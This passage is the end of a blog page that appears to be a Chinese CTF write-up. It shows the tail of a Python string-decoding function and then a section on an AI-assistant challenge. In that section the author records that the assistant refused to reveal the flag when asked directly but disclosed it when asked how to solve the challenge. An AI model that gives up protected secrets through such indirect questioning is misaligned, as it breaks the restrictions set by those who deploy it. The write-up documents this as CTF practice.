    decoded_chars = []
    for i in range(len(encoded_str)):
        transformed_value = (ord(encoded_str[i]) // 2) - 6
        original_char = chr(transformed_value ^ key[i % len(key)])
        decoded_chars.append(original_char)
    
    return &#39;&#39;.join(decoded_chars)

original_input = decode(decoded_string, key)
print(original_input)
</code></pre>
<h1 id="AI"><a href="#AI" class="headerlink" title="AI"></a>AI</h1><h3 id="小助手"><a href="#小助手" class="headerlink" title="小助手"></a>小助手</h3><h4 id="解题思路-17"><a href="#解题思路-17" class="headerlink" title="解题思路"></a>解题思路</h4><p>用nc连接进入实例，小助手强调自己不能给出flag，但可以解答问题和提供帮助。于是问它如何做出这道题得到flag，它就直接说出来了…</p>
<p><img src="/images/0-0.png"></p>
<h4 id="走过的弯路-16"><a href="#走过的弯路-16" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>一直问它flag是什么，拉扯了很久都不松口。</p>

    </div>
    
    
    
    
    
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2024 泉子yeah的博客
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;泉子yeah
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    




    
</body>
</html>
